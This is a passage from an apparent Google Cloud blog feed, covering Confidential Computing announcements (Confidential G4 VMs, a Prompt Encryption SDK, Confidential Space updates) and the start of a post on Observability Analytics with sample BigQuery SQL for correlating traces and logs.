&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;What makes this a game-changer is its global scale and flexibility. Confidential G4 is available in every &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/regions-zones/gpu-regions-zones#view-using-table"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud region&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that the standard G4 is available, across multiple &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#consumption_option_availability_by_machine_type"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;consumption models&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; including On Demand, Reservations, DWS Flex Start, and Spot/Preemptible. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"As organizations scale AI across multiple infrastructure environments, maintaining privacy and control over data and execution becomes increasingly challenging. Google Cloud Confidential G4 VMs powered by NVIDIA RTX PRO 6000 Blackwell GPUs are a meaningful addition to the expanding Confidential AI infrastructure ecosystem. As AI workflows now span agents, data sources, and infrastructure boundaries, Super Protocol provides a consistent Confidential AI operating model across Google Cloud Confidential VMs, other clouds, and on-premises environments — abstracting away confidential computing complexity and allowing teams to focus on AI outcomes," said Yulia Gontar, COO, Super Protocol.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Powered by 5th Generation AMD EPYC Turin CPUs leveraging AMD SEV, the G4 machine series with NVIDIA RTX PRO 6000 Blackwell GPUs activates robust hardware-based security. This architecture helps ensure that sensitive data is protected during processing inside the TEE, while also encrypting data as it travels between the CPU and GPU.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"GCP's Confidential G4 VM was the obvious choice for Vertebrae because privacy and security are non-negotiable for our customers. Our product processes sensitive work discussions, so we need to support hardware-signed attestation that both CPU and GPU are running in a trusted execution environment. Using confidential computing on Google Cloud lets us deliver the frontier of AI privacy in the cloud," said Andy Qin, CEO, &lt;/span&gt;&lt;a href="http://vertebrae.ai/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertebrae&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With Confidential G4, you can unlock AI inference, fine-tuning, HPC, and use cases involving highly restricted data, sensitive models, or private prompts, all with minimal performance impact. Get started with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/confidential-computing/confidential-vm/docs/create-a-confidential-vm-instance-with-gpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential G4 VMs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/gpus-confidential-nodes"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential G4 GKE Nodes&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enabling end-to-end private inference: Open-source Prompt Encryption SDKs&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Even as we make Confidential AI accessible, we understand that protecting sensitive data in AI workloads goes beyond securing the model execution environment. The prompts and responses themselves can contain highly-confidential information. To provide cryptographic protection for the entire inference lifecycle, we are happy to announce the open-source launch of our Prompt Encryption SDKs, now available on &lt;/span&gt;&lt;a href="https://github.com/google/prompt-encryption-sdk" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GitHub&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This toolkit helps you establish an end-to-end secure channel for your AI inference workloads, ensuring that prompts are cryptographically protected from the moment they leave the client until they are processed in the TEE; model responses are similarly protected all the way back to the client.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/promt_encryption_diagram.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Prompt and response encryption using Prompt Encryption SDK.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Client SDK is integrated into the client application and works in tandem with the Server SDK integrated into the inference server running in the TEE. Once the SDKs have been used to establish an attested TLS session, the client can be confident that the server is running an authorized workload within a verified Confidential Computing environment. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The client app can then send encrypted prompts to the inference server, knowing that only this server will be able to decrypt and process it in the TEE. Once the server has a response ready, it sends it back via the same encrypted channel to the client app.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;You can get started today with the &lt;/span&gt;&lt;a href="https://github.com/google/prompt-encryption-sdk" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GitHub repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and the &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/prompt-encryption-sdk#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Enabling Apple Private Cloud Compute on Google Cloud&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our commitment to privacy is deeply exemplified by our &lt;/span&gt;&lt;a href="https://security.apple.com/blog/expanding-pcc/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;collaboration with Apple&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to expand Private Cloud Compute (PCC) on Google Cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are proud to collaborate with Apple to extend Apple’s privacy and security commitments to PCC on Google Cloud. Our platform supports Apple’s PCC privacy commitments with a layered security approach built upon Google Cloud’s infrastructure. This includes leveraging Google Cloud Confidential Computing with &lt;/span&gt;&lt;a href="https://www.intel.com/content/www/us/en/developer/tools/trust-domain-extensions/overview.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Intel TDX&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://www.nvidia.com/en-us/data-center/solutions/confidential-computing/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NVIDIA Confidential Computing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with NVIDIA Blackwell GPUs, our &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/docs/security/titanium-hardware-security-architecture"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Titanium security architecture&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with the Titan chip, and a co-engineered open-source host stack to ensure verifiable transparency.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Together, these technologies help Apple PCC on Google Cloud meet stringent requirements for data protection and user privacy. To dive deeper into this collaboration, read our blog post: &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/powering-the-next-era-of-confidential-ai/?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Powering the next era of Confidential AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Advancing confidential foundations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Cloud is committed to making Confidential Computing capabilities broadly available across our infrastructure. Our goal is to integrate hardware-based security features deeply into our foundational compute offerings, allowing customers to enhance data protection without compromising performance or operational flexibility.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Bringing Intel Trusted Domain Extensions (TDX) to the C4 machine series&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Confidential VMs with Intel TDX on the C4 machine series will be available in preview soon.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Powered by the latest 6th Generation Intel Xeon processors, this integration offers a significant leap in compute density and performance for data-intensive workloads. By using Intel TDX, C4 instances create hardware-isolated Trust Domains (TDs) that protect sensitive applications and data from the underlying host and hypervisor. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This architecture provides confidentiality and privacy while enabling remote attestation so you can cryptographically verify the environment before processing sensitive data. Best of all, you can turn Confidential Computing on with a few clicks and no code changes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Expanding Live Migration capabilities&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Running mission-critical production environments requires high availability and continuous uptime, even during scheduled cloud maintenance. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Live Migration on C3D-based Confidential VMs is now generally available. This capability allows Google Cloud to perform planned hardware maintenance without interrupting workloads or exposing encrypted guest memory, ensuring seamless uptime for long-running confidential applications.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhancing trust and collaboration: Innovations in Confidential Space&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/confidential-computing/confidential-space/docs/confidential-space-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential Space&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is a Confidential Computing environment designed to enable secure multi-party computation and data sharing. It allows organizations to collaborate on sensitive data, such as for joint machine learning or data analytics, without revealing the data to each other or to Google Cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“Google Cloud Confidential Space allows us to provide financial institutions with security guarantees similar to or better than an on-prem service," said Olivier Richaud, vice-president, Platforms and Site Reliability Engineering, Symphony. "Transitioning such security and privacy-sensitive customers to a cloud-based SaaS service would have been impossible without the power of Confidential Computing.”&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A key design principle of Confidential Space is to remove the workload operator from the trust boundary, providing cryptographic assurance that only the authorized, attested workload can access the data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“As AI systems increasingly act on behalf of consumers in financial services, trust in how data is processed becomes paramount. At Sahamati, we see Google Cloud Confidential Space as a foundational technology for enabling privacy-preserving AI in India’s Open Finance ecosystem, creating the trust needed for innovation while maintaining strong security and accountability guarantees,” said Kiran Gopinath, chief innovation officer, and Head, Sahamati Labs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our new advancements for Confidential Space provide greater flexibility and stronger assurances. Key updates include:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Independent Verification: Integration with Intel Trust Authority&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are pleased to announce that &lt;/span&gt;&lt;a href="https://www.intel.com/content/www/us/en/security/trust-authority.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Intel Trust Authority&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (ITA) is now generally available as an independent attestation verifier service for Confidential Space.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This integration enables organizations to independently verify the integrity of the Confidential Space environment using Intel’s hardware-rooted attestation before encryption keys are released to workloads. By decoupling attestation verification from the cloud service provider, customers benefit from enhanced transparency, stronger assurance, and a more robust trust model.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"With Confidential Computing woven into our core infrastructure, Google Cloud and Intel are making hardware‑rooted security and independent attestation part of the default fabric of modern compute. From Intel TDX‑powered C4 Confidential VMs running production workloads, to Confidential Space with Intel Trust Authority — now generally available — enabling verifiable multi‑party collaboration, customers can now encrypt, verify, and scale their most sensitive AI and data workflows without rewriting applications or compromising performance, even in the most demanding regulatory environments,” said Anand Pashupathy, general manager and vice-president, Intel Product Assurance and Security (IPAS), Intel Corporation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Accelerating secure collaboration: Confidential Space with H100 GPU support&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To power secure multi-party AI and machine learning, Confidential Space &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/confidential-computing/confidential-space/docs/deploy-workloads#gpu-based-workloads"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;support&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for &lt;/span&gt;&lt;a href="https://www.nvidia.com/en-us/data-center/technologies/hopper-architecture/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;NVIDIA Hopper&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; GPUs is now generally available. This can help multiple parties pool their data for training and inference within a Confidential Space environment, using the power of Hopper GPUs, while ensuring that their individual data remains protected from other participants and from Google Cloud. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Confidential Space unlocks use cases like federated learning on sensitive datasets, and building joint models without centralizing data.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“Confidential GPU support in Google Cloud Confidential Space removes one of the biggest barriers to adopting secure AI: the tradeoff between protecting sensitive workloads and achieving production-grade performance," said Adi Hirschtein, VP Product, Duality. "For Duality customers in healthcare, financial services, and government, this enables federated learning, confidential AI, and encrypted RAG workflows to run on sensitive data at scale while keeping data and models protected throughout processing.”&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Next steps&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Confidential Computing is becoming an essential layer of cloud computing in the AI era. Explore our expanding portfolio of Confidential VMs, accelerated hardware, and open-source tools to see how you can enable secure collaboration and private AI innovation within your organization.  &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more, join us at the &lt;/span&gt;&lt;a href="https://events.linuxfoundation.org/confidential-computing-summit/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Confidential Computing Summit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on June 23 and 24, 2026.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/verifiable-trust-in-the-ai-era-whats-new-in-confidential-computing/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-23T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/management-tools/query-logs-and-traces-with-sql-in-observability-analytics/</id>
    <title>Log Analytics is now Observability Analytics: Query logs and traces with SQL</title>
    <updated>2026-06-23T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To effectively operate and troubleshoot applications, developers and site reliability engineers (SREs) need to understand the full context of their system's behavior, typically as part of their logging and observability tooling. Today, we’re excited to announce a variety of new capabilities in our &lt;/span&gt;&lt;a href="https://cloud.google.com/products/observability"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Cloud Observability&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; suite:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Log Analytics&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; is now &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Observability Analytics.&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Trace data&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; within Observability Analytics is generally available (GA).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Observability API&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for management and configuration is GA.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Together, these bring &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;logs and traces&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; together into a unified experience, helping you go from viewing high-level trends to deep, contextual, root-cause analysis for agentic as well as traditional workloads, and to configure and manage those workloads programmatically, as part of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/stackdriver/docs/observability/storage-manage"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;observability buckets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Further, support for SQL in Cloud Trace is an important new tool in your toolbelt. You can, for instance, write a single SQL query that joins your application logs with your distributed trace spans and find any checkout requests that took longer than 5 seconds, to instantly see which internal microservice spent the most time processing them. Or, for AI agents, you can analyze telemetry across thousands of runs to identify which tool calls most frequently fail, or calculate the aggregated P95 response time for all external tool executions to pinpoint performance bottlenecks. The possibilities are endless!&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, let’s take a closer look at Observability Analytics, and a few key use cases leveraging traces and logs, so you can put these new capabilities to work in your environment right away. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What is Observability Analytics?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Observability Analytics, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/devops-sre/introducing-cloud-loggings-log-analytics-powered-by-big-query"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;formerly Log Analytics&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, brings the power of BigQuery and SQL to your telemetry data directly within Cloud Observability. It allows you to run complex analytical queries joining high-volume log and trace data to identify patterns, troubleshoot issues, and generate insights into your agent and application's health and performance without having to move or duplicate data. This brings a number of important benefits:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Unified telemetry:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Run SQL queries to analyze and JOIN high-volume log and trace data in a single place.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Business correlation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Join your observability datasets with business-critical data stored in BigQuery (e.g., conversion rates, revenue, operational costs) to quantify the business impact of technical issues.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;In-place analysis:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Analyze your data where it’s already stored (in Cloud Logging and Cloud Trace), reducing duplicate export storage costs and complexity. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For instance, with Cloud Observability, you can analyze how application latency impacts conversion rates or identify the financial implications of service outages, transforming raw telemetry into actionable business intelligence.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Unlock deeper insights with traces and logs&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Correlating logs and traces in a single analytics view breaks down data silos and accelerates troubleshooting. You can now analyze performance trends from trace data and directly correlate them with corresponding application or infrastructure logs to understand the “why” behind the “what.” Let’s take a couple of examples.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Use case 1: AI agent optimization (analyzing tool failures and latency at scale)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;AI agents often perform complex, multi-step tasks by executing various external tools (e.g., database queries, web searches, API calls). When optimizing agents at scale, inspecting individual trace graphs in a UI often isn't enough. You need to answer systemic questions like “Which tools are failing most frequently?” and “Which ones are causing latency bottlenecks?”&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With Observability Analytics, you can run aggregate queries across millions of span events to calculate failure rates and latency percentiles (like P95) for every tool in your system.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Example query:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Rank agent tools by failure rate and 95th percentile latency over the last 7 days.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT\r\n  JSON_VALUE(attributes, \&amp;#x27;$.&amp;quot;agent.tool.name&amp;quot;\&amp;#x27;) AS tool_name,\r\n  COUNT(span_id) AS total_calls,\r\n  -- Calculate failure rate (status.code = 2 represents ERROR in OpenTelemetry)\r\n  SAFE_DIVIDE(COUNTIF(status.code = 2), COUNT(span_id)) * 100 AS failure_rate_percentage,\r\n  -- Calculate P95 latency in milliseconds\r\n  APPROX_QUANTILES(duration_nano / 1000000, 100)[OFFSET(95)] AS p95_latency_ms\r\nFROM\r\n  `YOUR_PROJECT_ID.us._Trace.Spans._AllSpans`\r\nWHERE\r\n  name = \&amp;#x27;Agent.executeTool\&amp;#x27; -- Filter for spans representing tool execution\r\n  AND start_time BETWEEN TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 7 DAY) AND CURRENT_TIMESTAMP()\r\nGROUP BY\r\n  tool_name\r\nORDER BY\r\n  failure_rate_percentage DESC, p95_latency_ms DESC\r\nLIMIT 10&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f831db892e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With the above query, you can:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Spot bottlenecks&lt;/strong&gt;: Instantly see if a tool like &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;DatabaseQueryTool&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; has a P95 latency of 8 seconds, indicating you need to optimize database indexes or connections.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Identify flaky tools&lt;/strong&gt;: Discover if a specific API tool has a 15% failure rate, suggesting API rate limits or integration bugs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Drill down to the prompt&lt;/strong&gt;: Once you identify a flaky tool, you can write a follow-up query joining these trace spans with application logs to extract the exact LLM prompt and reasoning that led to the failures. Here’s that SQL query:&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;SELECT\r\n  t.name AS tool_name,\r\n  l.timestamp,\r\n  -- Retrieve the agent\&amp;#x27;s thoughts and the prompt from application logs\r\n  JSON_VALUE(l.json_payload.agent_thoughts) AS agent_reasoning,\r\n  JSON_VALUE(l.json_payload.llm_prompt) AS prompt_sent_to_llm\r\nFROM\r\n  `YOUR_PROJECT_ID.us._Trace.Spans._AllSpans` t\r\nJOIN\r\n  `YOUR_PROJECT_ID.us._Default._AllLogs` l\r\nON\r\n  t.trace_id = SPLIT(l.trace, \&amp;#x27;/\&amp;#x27;)[SAFE_OFFSET(3)]\r\n  AND t.span_id = l.spanId\r\nWHERE\r\n  t.name = \&amp;#x27;Agent.executeTool\&amp;#x27;\r\n  AND JSON_VALUE(t.attributes, \&amp;#x27;$.&amp;quot;agent.tool.name&amp;quot;\&amp;#x27;) = \&amp;#x27;NameOfFlakyTool\&amp;#x27;\r\n  AND t.status.code = 2 -- Filter for failed tool calls\r\n  AND l.severity = \&amp;#x27;ERROR\&amp;#x27;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f831db891c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Use case 2: Identify latency impact on specific customers (business context)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you don't propagate user or customer identifiers in your trace attributes (e.g., for privacy or technical reasons), but you do log them in your application access logs, you can join traces and logs to identify which customers are experiencing the worst performance.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Example query:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Find the top 10 customers experiencing the highest 95th percentile latency.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;SELECT\r\n  JSON_VALUE(l.json_payload.customer_id) AS customer_id,\r\n  AVG(t.duration_nano / 1000000) AS avg_latency_ms,\r\n  APPROX_QUANTILES(t.duration_nano / 1000000, 100)[OFFSET(95)] AS p95_latency_ms,\r\n  COUNT(t.span_id) AS total_requests\r\nFROM\r\n  `YOUR_PROJECT_ID.us._Trace.Spans._AllSpans` AS t\r\nJOIN\r\n  `YOUR_PROJECT_ID.us._Default._AllLogs` AS l\r\nON\r\n  t.trace_id = SPLIT(l.trace, &amp;#x27;/&amp;#x27;)[SAFE_OFFSET(3)]\r\n  AND t.span_id = l.spanId\r\nWHERE\r\n  t.start_time BETWEEN TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 1 DAY) AND CURRENT_TIMESTAMP()\r\n  AND t.kind.name = &amp;#x27;SPAN_KIND_SERVER&amp;#x27;\r\n  AND JSON_VALUE(l.json_payload.customer_id) IS NOT NULL\r\nGROUP BY\r\n  customer_id\r\nORDER BY\r\n  p95_latency_ms DESC\r\nLIMIT 10&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f831db89d30&amp;gt;)])]&amp;gt;&lt;/dd&gt;
